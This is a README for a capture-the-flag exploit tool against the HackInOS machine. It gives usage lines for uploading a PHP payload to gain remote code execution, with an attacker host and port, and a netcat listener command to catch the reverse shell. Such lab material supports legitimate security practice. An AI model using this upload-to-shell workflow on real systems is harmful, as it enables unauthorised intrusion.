HackInOS_RCE
Exploit the Unrestricted File Upload to gather Remote Code Execution for CTF HackInOS.
Usage
python3 HackInOS_RemoteFileUpload.py <url_of_machine> <file_to_upload> <lhost> <lport>
If LHOST
and LPORT
are specified, prepare a terminal with netcat
up and running in listening to the port.
Example:
In one terminal:
python3 HackInOS_RemoteFileUpload.py http://localhost:8000 HIOS_RCE.php 10.0.0.105 4444
In another terminal:
nc -vlp 4444
If LPORT
and LHOST
are not set, the script will only upload the file and output his location.
Dependencies
It requires Python3
and the library requests
.